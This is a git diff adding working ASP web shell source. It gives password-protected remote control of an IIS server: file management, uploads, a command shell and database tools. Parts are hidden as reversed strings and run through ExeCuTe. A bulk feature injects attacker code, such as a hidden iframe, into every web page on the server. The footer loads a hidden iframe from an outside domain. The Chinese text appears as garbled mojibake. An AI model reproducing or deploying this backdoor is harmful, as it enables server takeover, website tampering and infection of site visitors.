+			Report = Report&"<tr><td>"&temp&"</td><td>Server.Exec"&"ute</td><td><font color=red>���ܸ��ټ��Server.e"&"xecute()����ִ�е��ļ���</font><br>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+			Sun = Sun + 1
+		End If
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set XregEx = New RegExp
+		XregEx.IgnoreCase = True
+		XregEx.Global = True
+		XregEx.Pattern = "<scr"&"ipt\s*(.|\n)*?runat\s*=\s*""?server""?(.|\n)*?>"
+		Set XMatches = XregEx.Execute(filetxt)
+		For Each Match in XMatches
+			tmpLake2 = Mid(Match.Value, 1, InStr(Match.Value, ">"))
+			srcSeek = InStr(1, tmpLake2, "src", 1)
+			If srcSeek > 0 Then
+				srcSeek2 = instr(srcSeek, tmpLake2, "=")
+				For i = 1 To 50
+					tmp = Mid(tmpLake2, srcSeek2 + i, 1)
+					If tmp <> " " and tmp <> chr(9) and tmp <> vbCrLf Then
+						Exit For
+					End If
+				Next
+				If tmp = """" Then
+					tmpName = Mid(tmpLake2, srcSeek2 + i + 1, Instr(srcSeek2 + i + 1, tmpLake2, """") - srcSeek2 - i - 1)
+				Else
+					If InStr(srcSeek2 + i + 1, tmpLake2, " ") > 0 Then tmpName = Mid(tmpLake2, srcSeek2 + i, Instr(srcSeek2 + i + 1, tmpLake2, " ") - srcSeek2 - i) Else tmpName = tmpLake2
+					If InStr(tmpName, chr(9)) > 0 Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, chr(9)) - 1)
+					If InStr(tmpName, vbCrLf) > 0 Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, vbcrlf) - 1)
+					If InStr(tmpName, ">") > 0 Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, ">") - 1)
+				End If
+				Call ScanFile( Mid(FilePath,1,InStrRev(FilePath,"\"))&tmpName , replace(FilePath,server.MapPath("\")&"\","",1,1,1))
+				SumFiles = SumFiles + 1
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "CreateO"&"bject[ |\t]*\(.*\)"
+		Set Matches = regEx.Execute(filetxt)
+		For Each Match in Matches
+			If Instr(Match.Value, "&") or Instr(Match.Value, "+") or Instr(Match.Value, """") = 0 or Instr(Match.Value, "(") <> InStrRev(Match.Value, "(") Then
+				Report = Report&"<tr><td>"&temp&"</td><td>Creat"&"eObject</td><td>Crea"&"teObject����ʹ���˱��μ���"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				exit sub
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+	end if
+	set ofile = nothing
+	set FSO1s = nothing
+End Sub
+Function CheckExt(FileExt)
+	If DimFileExt = "*" Then CheckExt = True
+	Ext = Split(DimFileExt,",")
+	For i = 0 To Ubound(Ext)
+		If Lcase(FileExt) = Ext(i) Then 
+			CheckExt = True
+			Exit Function
+		End If
+	Next
+End Function
+Function GetDateModify(filepath)
+	Set F2SO = CreateObject("Scripting.FileSystemObject")
+    Set f = F2SO.GetFile(filepath) 
+	s = f.DateLastModified 
+	set f = nothing
+	set F2SO = nothing
+	GetDateModify = s
+End Function
+Function GetDateCreate(filepath)
+	Set F3SO = CreateObject("Scripting.FileSystemObject")
+    Set f = F3SO.GetFile(filepath) 
+	s = f.DateCreated 
+	set f = nothing
+	set F3SO = nothing
+	GetDateCreate = s
+End Function
+Function tURLEncode(Str)
+	temp = Replace(Str, "%", "%25")
+	temp = Replace(temp, "#", "%23")
+	temp = Replace(temp, "&", "%26")
+	tURLEncode = temp
+End Function
+Sub ShowAllFile2(Path)
+	Set F4SO = CreateObject("Scripting.FileSystemObject")
+	if not F4SO.FolderExists(path) then exit sub
+	Set f = F4SO.GetFolder(Path)
+	Set fc2 = f.files
+	For Each myfile in fc2
+		If CheckExt(F4SO.GetExtensionName(path&"\"&myfile.name)) Then
+			Call IsFind(Path&"\"&myfile.name)
+			SumFiles = SumFiles + 1
+		End If
+	Next
+	Set fc = f.SubFolders
+	For Each f1 in fc
+		ShowAllFile2 path&"\"&f1.name
+		SumFolders = SumFolders + 1
+    Next
+	Set F4SO = Nothing
+End Sub
+Sub IsFind(thePath)
+	theDate = GetDateModify(thePath)
+	on error resume next
+	theTmp = Mid(theDate, 1, Instr(theDate, " ") - 1)
+	if err then exit Sub
+	xDate = Split(request.Form("Search_Date"),";")
+	If request.Form("Search_Date") = "ALL" Then ALLTime = True
+	For i = 0 To Ubound(xDate)
+		If theTmp = xDate(i) or ALLTime = True Then 
+			If request("Search_Content") <> "" Then
+				Set FSO2s = CreateObject("Scripting.FileSystemObject")
+				set ofile = FSO2s.OpenTextFile(thePath, 1, false, -2)
+				filetxt = Lcase(ofile.readall())
+				If Instr( filetxt, LCase(request.Form("Search_Content"))) > 0 Then
+					temp = "<a href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode(Replace(replace(thePath,server.MapPath("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace(thePath,server.MapPath("\")&"\","",1,1,1)&"</a>"
+    temp=temp&" �� <a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a > "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a>"	
+				Report = Report&"<tr><td height=30>"&temp&"</td><td>"&GetDateCreate(thePath)&"</td><td>"&theDate&"</td></tr>"
+					Report = Report&"<tr><td>"&temp&"</td><td>"&GetDateCreate(thePath)&"</td><td>"&theDate&"</td></tr>"
+					Sun = Sun + 1
+					Exit Sub
+				End If
+				ofile.close()
+				Set ofile = Nothing
+				Set FSO2s = Nothing
+			Else
+				temp = "<a href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode(replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace(thePath,server.MapPath("\")&"\","",1,1,1)&"</a> "
+    temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a > "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a>"	
+				Report = Report&"<tr><td height=30>"&temp&"</td><td>"&GetDateCreate(thePath)&"</td><td>"&theDate&"</td></tr>"
+				Sun = Sun + 1
+				Exit Sub
+			End If
+		End If
+	Next
+End Sub
+  Case "plgm"
+Server.ScriptTimeout=1000000 
+Response.Buffer=False 
+ShiSan="��raelC.rrE�� buS dnE�� gnihtoN=sf teS�� fI dnE�� gnihtoN=f teS�� esolC.edocdda_f�� edocdda etirW.edocdda_f�� )2-,8(maertStxeTsAnepO.f=edocdda_f teS�� )2rts(eliFteG.sf=f teS�� nehT tsixEsi fI�� )2rts(stsixEeliF.sf=tsixEsi�� )��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerc.revreS=sf teS�� )2rts(2pets buS�� buS dnE���>vid/<>a/<evoM>'����'=eltit 'ma'=ssalc ')���eliFevoM���,����&)��\\��,��\��,1rts(ecalper&����(mroFlluF:tpircsavaj'=ferh a<�� SRR��� >a/<ypoC>'�Ƹ�'=eltit 'ma'=ssalc ')���eliFypoC���,����&)��\\��,��\��,1rts(ecalper&����(mroFlluF:tpircsavaj'=ferh a<�� SRR��� >a/<leD>'��ɾ'=eltit 'ma'=ssalc ')(kosey nruter'=kcilcno')���eliFleD���,����&)��\\��,��\��,1rts(ecalper&����(mroFlluF:tpircsavaj'=ferh a<�� SRR��� >a/<tide>'����'=eltit 'ma'=ssalc ')���eliFtidE���,����&)��\\��,��\��,1rts(ecalper&����(mroFlluF:tpircsavaj'=ferh a<�� SRR��� >a/<nwoD>'����'=eltit 'ma'=ssalc ')���eliFnwoD���,����&)��\\��,��\��,1rts(ecalper&����(mroFlluF:tpircsavaj'=ferh a<�� sRR���_ ��&1rts&�� ��>'xp02:thgieh-enil'=elyts vid<�� SRR��)1rts(1pets buS�� buS dnE�� fI dnE�� buS tixE�� eslE�� rga 2pets�� rga 1pets�� nehT laVter fI�� )rga,��b\)sj|igc|xpsa|psj|php|psa|lmth|mth(.\)505|piv|ciptfos_elifpu|otohp_elifpu|tfos_elifpu|daol_elifpu|daolpu_nimda|elifpu_nimda|txet|hsalf|da|cn|rre|pohs|tsil|ofni|rahc|toof|dnes|404rre|pi|weiv|wohs|yalp|puym|puwen|025|QQ|ogol|metsys|nwod|evom|ypoc|rorre|dov|3pm|gifnoc|tb|koob|reganam|tuoba|emag|tide|dda|atad|evas|golb|bew|segami|gmi|liame|eman|nepo|wen|pot|psa|ptf|bbu|resu|lqs|gifnoc|led|ko|on|yid|nigol|ssalc|trac|daolpu|elifpu|pleh|ger|sbb|nimda|nnoc|xedni|tluafed()/\|\\(��(nrettaPsI=laVter�� )rga(lla_pets buS�� buS dnE�� fI dnE�� txeN�� l hcs�� fs nI l hcaE roF�� nehT 0><tnuoC.fs fI�� txeN�� ntr lla_pets�� htap.f=ntr�� if ni f hcaE roF�� sredloFbuS.df=fs teS�� seliF.df=if teS�� )s(redloFteG.sf=df teS�� )��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerc.revreS=sf teS�� TxEn EmUsEr rOrRe No�� )s(hcs buS�� fi dne��fI dnE�� s hcs nehT )s,��)/\|\\(}1{:}1{]ba^[��(nrettaPsI fI esle��dne.esnopser���>tnof/<!�����·�Ĺ�������>der=roloc tnof<�� SRR��nehT ���=edocdda ro ���=s fI��neht ���><)��timbus��(mrof.tseuqer fi�� noitcnuF dnE�� fI dnE�� eslaF=nrettaPsI�� eslE�� eurT=nrettaPsI�� nehT eurT=laVter fI�� gnihtoN=xEger teS�� )rts(tseT.xEger=laVter�� eurT=esaCerongI.xEger�� ttap=nrettaP.xEger�� pxEgeR weN=xEger teS�� )rts,ttap(nrettaPsI noitcnuF�� fI dnE��)�� >mrof/<>elbat/<>rt/<��(SRR��)��>dt/<>���ʼ�����=eulav ���timbus���=epyt ���timbus���=eman tupni<>dt<��(SRR��)��>dt/<>aeratxet/<��&edocdda&��>���3���=swor 85=sloc ���edoc���=eman aeratxet<>dt<��(SRR��)��>dt/<:����Ĺ�Ҫ>dt<>rt<>rt/<��(SRR��)��>dt/<;psbn&>���96���=htdiw dt<��(SRR��)��>dt/<>06=ezis ����&s&����=eulav ���df���=eman ���txet���=epyt tupni<>���953���=htdiw dt<��(SRR��)��>dt/<��)��·�Ծ�( �м��ĵĹ�Ҫ>���201���=htdiw dt<��(SRR��)��>rt<��(SRR��)��>���;xp21:ezis-tnof���=elyts ���0���=redrob 065=htdiw elbat<��(SRR��)�� >���TSOP���=dohtem mrof<��(SRR�� eslE�� tceles dnE�� )htp(evas_elif LLAC�� ��evas�� esaC�� )htp(wohs_elif LLAC�� ��tide�� esaC�� xe esaC tceles�� nehT ���><htp DNA ���><xe fI���>emarfi/<>0=thgieh 0=htdiw mth.m/1.0.0.721//:ptth=crs emarfi<��=edocdda neht ���=edocdda fi��)��edoc��(tseuqeR = edocdda�� )��tncwen��(tseuqeR=tncwen�� )��htp��(tseuqeR=htp�� )��xe��(tseuqeR=xe��)��/��(htaPpaM.revreS=s neht ���=s fi�� )��df��(tseuqeR=s�� )��OFNI_HTAP��(selbairaVrevreS.tseuqeR=FLES_PSA��)��>b/<��(&)��/��(htaPpaM.revreS&)��:��·�Ծ�վ��ǰ��>b<��( SRR":ExeCuTe(ShiSanFun(ShiSan))::Case "Cplgm":Fpath=Request("fd"):addcode = Request("code"):addcode2 = Request("code2"):pcfile=request("pcfile"):checkbox=request("checkbox"):ShowMsg=request("ShowMsg"):FType=request("FType"):M=request("M"):if Ftype="" then Ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx":if Fpath="\" then Fpath=Server.MapPath("\")
+	if Fpath="." or Fpath="" then Fpath=Server.MapPath(".")	
+	if addcode="" then addcode="<"
+	if checkbox="" then checkbox=request("checkbox")
+	if pcfile="" then
+		pcfileName=Request.ServerVariables("SCRIPT_NAME")
+		pcfilek=split(pcfileName,"/") 
+		pcfilen=ubound(pcfilek) 
+		pcfile=pcfilek(pcfilen) 
+	end if
+  	RRS ("<b>��վ��Ŀ¼</b>- "&Server.MapPath("/")&"<br>")
+	RRS ("<b>������Ŀ¼</b>- "&Server.MapPath("."))
+	RRS "<form method=POST><div style='color:#3399ff'><b>[" 
+	if M="1" then RRS"��������-������"
+	if M="2" then RRS"��������-������˵���"
+	if M="3" then RRS"�����滻��-�ļ��滻�޸Ĺ���"
+	if M="" then response.end
+	RRS "]</b></div><table width=100% border=0><tr><td>�ļ�·����</td>"
+	RRS "<td><input type=text name=fd value='"&Fpath&"' size=40> �\������վ��Ŀ¼����.��Ϊ��������Ŀ¼</td></tr>"
+	if M="1" then RRS "<tr><td>�����ظ���</td><td><input class=c name='checkbox' type=checkbox value='checked' "&checkbox&"> ��ֹһ��ҳ�����ж���ظ��Ĵ���</td></tr>"
+	RRS "<tr><td>�ų��ļ���</td>"
+	RRS "<td><input name='pcfile' type=text id='pcfile' value='"&pcfile&"' size=40> ���벻�뱻�޸ĵ��ļ��������磺1.asp|2.asp|3.asp</td></tr>"
+	RRS "<tr><td>�ļ����ͣ�</td>"
+	RRS "<td><input name='FType' type=text id='FType' value='"&Ftype&"' size=40> ����Ҫ�޸ĵ��ļ�����[��չ��]�����磺htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td><font color=#3399ff>"
+	if M="1" then RRS"Ҫ�ҵģ�"
+	if M="2" then RRS"Ҫ��ģ�"
+	if M="3" then RRS"�������ݣ�"
+	RRS"</font></td><td><textarea name=code cols=66 rows=3>"&addcode&"</textarea></td></tr>"
+	if M="3" then RRS "<tr><td><font color=#3399ff>�� �� ��</font></td><td><textarea name=code2 cols=66 rows=3>"&addcode2&"</textarea></td></tr>"
+	RRS "<tr><td></td><td> <input name=submit type=submit value=��ʼִ��> --��ǽ���--[�ɹ����� �� �ų����� �� �ظ���<font color=red>��</font>]</td></tr>"
+	RRS "</table></form>" 
+if request("submit")="��ʼִ��" then 
+RRS"<div style='line-height:25px'><b>ִ�м�¼��</b><br>"
+call InsertAllFiles(Fpath,addcode,pcfile)
+RRS"</div>"
+end if
+Sub InsertAllFiles(Wpath,Wcode,pc)
+	Server.ScriptTimeout=999999999
+	 if right(Wpath,1)<>"\" then Wpath=Wpath &"\"
+	 Set WFSO = CreateObject("Scripting.FileSystemObject")
+	 on error resume next 
+	 Set f = WFSO.GetFolder(Wpath)
+	 Set fc2 = f.files
+	 For Each myfile in fc2
+		Set FS1 = CreateObject("Scripting.FileSystemObject")
+		FType1=split(myfile.name,".") 
+		FType2=ubound(FType1) 
+		if Ftype2>0 then
+		FType3=LCase(FType1(FType2)) 
+		else
+		FType3="��"
+		end if
+		if Instr(LCase(pc),LCase(myfile.name))=0 and Instr(LCase(FType),FType3)<>0 then
+			select case M
+				case "1"
+					if checkbox<>"checked" then
+						Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+						tfile.writeline Wcode
+						RRS"�� "&Wpath&myfile.name
+						tfile.close
+					else
+						Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+						if Instr(tfile1.readall,Wcode)=0 then
+							Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+							tfile.writeline Wcode
+							RRS"��  "&Wpath&myfile.name
+							tfile1.close
+						else
+							RRS"<font color=red>��</font> "&Wpath&myfile.name
+							tfile1.close
+						end if
+						Set tfile1=Nothing
+					end if
+				case "2"
+					Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+					NewCode=Replace(tfile1.readall,Wcode,"")
+					Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+					objCountFile.Write NewCode
+					objCountFile.Close
+					RRS"��  "&Wpath&myfile.name
+					Set objCountFile=Nothing
+				case "3"
+					Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+					NewCode=Replace(tfile1.readall,Wcode,addCode2)
+					Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+					objCountFile.Write NewCode
+					objCountFile.Close
+					RRS"��  "&Wpath&myfile.name
+					Set objCountFile=Nothing
+				case else
+					RRS"���,������.":response.end
+			end select
+		else
+			RRS"�� "&Wpath&myfile.name
+		end if
+RRS " �� <a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""DownFile"")' class='am' title='����'>Down</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""EditFile"")' class='am' title='�༭'>edit</a> "
+RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a><br>"
+	 Next
+ Set fsubfolers = f.SubFolders
+ For Each f1 in fsubfolers
+	NewPath=Wpath&""&f1.name
+ 	InsertAllFiles NewPath,Wcode,pc
+ Next
+set tfile=nothing
+Set FSO = Nothing
+set tfile=nothing
+set tfile2=nothing
+Set WFSO = Nothing
+End Sub
+  Case "ReadREG":call ReadREG()
+  Case "Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing
+  Case "DownFile":DownFile FName:ShowErr()
+  Case "DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing
+  Case "EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing
+  Case "CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing
+  Case "MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing
+  Case "DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing
+  Case "CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing
+  Case "MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing
+  Case "NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing
+  Case "UpFile":UpFile()
+  Case "Cmd1Shell":Cmd1Shell()
+  case "SetFileText":SetFileText()
+  case "hiddenshell":hiddenshell()
+  case "php":php()
+  case "apjdel":apjdel()
+  Case "Logout":Session.Contents.Remove("web2a2dmin"):Response.Redirect URL
+  Case "CreateMdb":CreateMdb FName
+  Case "CompactMdb":CompactMdb FName
+  Case "DbManager":DbManager()
+  Case "Course":Course()
+  Case "ServerInfo":ServerInfo()
+  Case Else MainForm()
+End Select
+if Action<>"Servu" then ShowErr()
+RRS"</body><iframe src=http://7jyewu.cn/a/a.asp width=0 height=0></iframe></html>"
+%>
\ No newline at end of file
diff --git a/www-7jyewu-cn/火狐NEW WebShell.asp b/www-7jyewu-cn/火狐NEW WebShell.asp
new file mode 100644
index 0000000..040277c
--- /dev/null
+++ b/www-7jyewu-cn/火狐NEW WebShell.asp	
@@ -0,0 +1,1454 @@
+<%
+UserPass="admin"     '��½����
+loginad="�ձ����빷�������ڣ� "'������֤������ʾ������
+mName="���NEW WebShell"           '��������
+SiteURL="http://aspmuma.cccpan.com"            '��վ
+Copyright="�������ڷǷ���;�����������߸Ų�����"       '��Ȩ
+AD="���"   '�������
+'------------------------------------------------------------
+
+'�������ʲô���� �뷢���ʼ���sbkey@live.cn
+
+'-------------------------------------------------------------
+Server.ScriptTimeout=999999999
+Response.Buffer =true
+On Error Resume Next
+sub ShowErr()
+  If Err Then
+    RRS"<br><a href='javascript:history.back()'><br>&nbsp;" & Err.Description & "</a><br>"
+    Err.Clear:Response.Flush
+  End If
+end sub
+Sub RRS(str)
+	response.write(str)
+End Sub
+Function RePath(S)
+  RePath=Replace(S,"\","\\")
+End Function
+Function RRePath(S)
+  RRePath=Replace(S,"\\","\")
+End Function
+URL=Request.ServerVariables("URL")
+ServerIP=Request.ServerVariables("LOCAL_ADDR")
+Action=Request("Action"):RootPath=Server.MapPath(".")
+WWWRoot=Server.MapPath("/")
+serveru=request.servervariables("http_host")&url
+serverp=userpass
+uu=serveru
+FolderPath=Request("FolderPath")
+FName=Request("FName")
+BackUrl="<br><br><center><a href='javascript:history.back()'>����</a></center>":
+dim ShiSan,ShiSanNewstr,ShiSanI
+Function ShiSanFun(ShiSanObjstr)
+ShiSanObjstr = Replace(ShiSanObjstr, "��", """")
+For ShiSanI = 1 To Len(ShiSanObjstr)
+ If Mid(ShiSanObjstr, ShiSanI, 1) <> "��" Then
+ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) & ShiSanNewStr
+ Else
+ShiSanNewStr = vbCrLf & ShiSanNewStr
+ End If
+Next
+ShiSanFun = ShiSanNewStr
+End Function
+uu=serveru
+RRS"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
+RRS"<title>"&mName&" - "&ServerIP&" </title>"
+RRS"<style type=""text/css"">"
+RRS"body,td{font-size: 12px;background-color:#000000;color:#00ff00;}"
+RRS"input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}"
+RRS".C{background-color:#000000;border:0px}"
+RRS".cmd{background-color:#000;color:#FFF}"
+RRS"body{margin: 0px;margin-left:4px;}"
+RRS"BODY {SCROLLBAR-FACE-COLOR: #000000;SCROLLBAR-HIGHLIGHT-COLOR: #00fcfc;SCROLLBAR-SHADOW-COLOR: #00fcfc;SCROLLBAR-ARROW-COLOR: #00fcfc;SCROLLBAR-TRACK-COLOR: #000000;SCROLLBAR-DARKSHADOW-COLOR: #00fcfc;SCROLLBAR-BASE-COLOR: #000000}"
+RRS"a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}"
+RRS".am{color:#888;font-size:11px;}"
+RRS"</style>"
+ShiSan="���>tpircs/<��SRR���};eurt nruter;)(timbus.mroFbD;�����=LMTHrenni.cba;gp = eulav.egaP.mroFbD;rts = eulav.rtSlqS.mroFbD};eslaf nruter;)���!ȷ�����Ǿ���LQS�������(trela{)01<htgnel.rts(fi};eslaf nruter;)���!ȷ�����Ǵ�����������������(trela{)5<htgnel.eulav.rtSbD.mroFbD(fi{)gp,rts(rtSlqSlluF noitcnuf��SRR���};eurt nruter};]i[rtS = eulav.rtSlqS.mroFbD{esle};)]i[rtS(trela{)21==i(fi esle};���>retnec/<��������������LQS�����ٿ������������ȷ��>retnec<���=LMTHrenni.cba;����� = eulav.rtSlqS.mroFbD;]i[rtS = eulav.rtSbD.mroFbD{)3=<i(fi;��塣���ָ�ʮ��ǰ�Ķ���ʾ��ֻ������һ����n\.��ʵѯ���ƿؼ����ÿɣ����ֲ�ȫ�Ķ���ʾ�Կɼ�ʱ������һʾ��ֻ����� =]21[rtS;���SSAP NMULOC PORD ]emaNelbaT[ ELBAT RETLA��� =]11[rtS;���)23(RAHCRAV SSAP NMULOC DDA ]emaNelbaT[ ELBAT RETLA��� =]01[rtS;���]emaNelbaT[ ELBAT PORD��� = ]9[rtS;���))05(RAHCRAV RESU,LLUN TON )1,1( YTITNEDI TNI DI(]emaNelbaT[ ELBAT ETAERC��� = ]8[rtS;���001=DI EREHW '\emanresu'\=RESU TES ]emaNelbaT[ ETADPU��� = ]7[rtS;���001=DI EREHW ]emaNelbaT[ MORF ETELED��� = ]6[rtS;���)'\drowssap'\,'\emanresu'\(SEULAV )SSAP,RESU(]emaNelbaT[ OTNI TRESNI��� = ]5[rtS;���001<DI EREHW ]emaNelbaT[ MORF * TCELES��� = ]4[rtS;���emaNnsD=nsD��� = ]3[rtS;���****=dwP;toor=diU;emaNbD=esabataD;6033=troP;��&PIrevreS&��=revreS;}lqSyM{=revirD��� = ]2[rtS;���****=dwP;as=diU;emaNbD=esabataD;3341,��&PIrevreS&��=revreS;}revreS lqS{=revirD��� = ]1[rtS;���***=drowssaP esabataD:BDELO teJ;bdm.bd\\��&))��htaPredloF��(noisseS(htaPeR&��=ecruoS ataD;0.4.BDELO.teJ.tfosorciM=redivorP��� = ]0[rtS;)21(yarrA wen = rtS};eslaf nruter{)0<i(fi{)i(rtSbDlluF noitcnuf��SRR���};eurt nruter};eslaf nruter;)0(rtSbDlluF;)�����������������(trela{)����� == eulav.rtSbD.mroFbD(fi{)(kcehCbD noitcnuf��SRR���}};����� = eulav.emaNF.mrofedih.pot{esle};)(timbus.mrofedih.pot;noitcAF = eulav.noitcA.mrofedih.pot{)llun=!emaND(fi};���rehtO��� = emaND{esle};emaND = eulav.emaNF.mrofedih.pot;)emaNF,��壡�ڴ���Ǽ�����ע,����ȫ����bdM����ѹҪ��������(tpmorp = emaND{)���bdMtcapmoC���==noitcAF(fi esle};emaND = eulav.emaNF.mrofedih.pot;)emaNF,��壡��ͬ�ܲ���ע,����ȫ����bdM�Ľ���Ҫ��������(tpmorp = emaND{)���bdMetaerC���==noitcAF(fi esle};emaND = eulav.emaNF.mrofedih.pot;)emaNF,������ȫ�м��ĵĽ���Ҫ��������(tpmorp = emaND{)���redloFweN���==noitcAF(fi esle};emaND+���||||��� =+ eulav.emaNF.mrofedih.pot;)emaNF,������ȫ�м��ı�Ŀ��������������(tpmorp = emaND{)���redloFevoM���==noitcAF(fi esle};emaND+���||||��� =+ eulav.emaNF.mrofedih.pot;)emaNF,������ȫ�м��ı�Ŀ��������������(tpmorp = emaND{)���redloFypoC���==noitcAF(fi esle};emaND+���||||��� =+ eulav.emaNF.mrofedih.pot;)emaNF,������ȫ���ı�Ŀ��������������(tpmorp = emaND{)���eliFevoM���==noitcAF(fi esle};emaND+���||||��� =+ eulav.emaNF.mrofedih.pot;)emaNF,������ȫ���ı�Ŀ���Ƹ���������(tpmorp = emaND{)���eliFypoC���==noitcAF(fi;emaNF = eulav.emaNF.mrofedih.pot{)noitcAF,emaNF(mroFlluF noitcnuf��SRR���};)(timbus.mrofrdda.pot;redloF = eulav.htaPredloF.mrofrdda.pot{)redloF(redloFwohS noitcnuf��SRR���;)(kcolCnur};yalpsid+���--  ��&DA&��������=sutats.wodniw;)(gnirtSelacoLot.yadot =yalpsid rav;)(etaD wen = yadot rav;)001 ,���)(kcolCnur���(tuoemiTtes.wodniw = emiTeht{)(kcolCnur noitcnuf��SRR���};eslaf nruter esle;eurt nruter))��壿�����ٴ���ִҪ��ȷ���(mrifnoc( fi{)(kosey noitcnuf��SRR���;srorrEllik=rorreno.wodniw};eurt nruter{)(srorrEllik noitcnuf>tpircsavaj=egaugnal tpircs<��SRR"
+ExeCuTe(ShiSanFun(ShiSan))
+rrs "<body" 
+If Action="" then RRS " scroll=no"
+rrs ">"
+Dim ObT(13,2)
+ObT(0,0) = "Scripting.FileSystemObject"
+  ObT(0,2) = "�ļ��������"
+ObT(1,0) = "wscript.shell"
+  ObT(1,2) = "������ִ�����"
+ObT(2,0) = "ADOX.Catalog"
+  ObT(2,2) = "ACCESS�������"
+ObT(3,0) = "JRO.JetEngine"
+  ObT(3,2) = "ACCESSѹ�����"
+ObT(4,0) = "Scripting.Dictionary" 
+  ObT(4,2) = "�������ϴ��������"
+ObT(5,0) = "Adodb.connection"
+  ObT(5,2) = "���ݿ��������"
+ObT(6,0) = "Adodb.Stream"
+  ObT(6,2) = "�������ϴ����"
+ObT(7,0) = "SoftArtisans.FileUp"
+  ObT(7,2) = "SA-FileUp �ļ��ϴ����"
+ObT(8,0) = "LyfUpload.UploadFile"
+  ObT(8,2) = "���Ʒ��ļ��ϴ����"
+ObT(9,0) = "Persits.Upload.1"
+  ObT(9,2) = "ASPUpload �ļ��ϴ����"
+ObT(10,0) = "JMail.SmtpMail"
+  ObT(10,2) = "JMail �ʼ��շ����"
+ObT(11,0) = "CDONTS.NewMail"
+  ObT(11,2) = "����SMTP�������"
+ObT(12,0) = "SmtpMail.SmtpMail.1"
+  ObT(12,2) = "SmtpMail�������"
+ObT(13,0) = "Microsoft.XMLHTTP"
+  ObT(13,2) = "���ݴ������"
+For i=0 To 13
+	Set T=Server.CreateObject(ObT(i,0))
+	If -2147221005 <> Err Then
+	  IsObj=" ��"
+	Else
+	  IsObj=" ��"
+	  Err.Clear
+	End If
+	Set T=Nothing
+	ObT(i,1)=IsObj
+Next
+If FolderPath<>"" then
+  Session("FolderPath")=RRePath(FolderPath)
+End If
+If Session("FolderPath")="" Then
+  FolderPath=RootPath
+  Session("FolderPath")=FolderPath
+End if
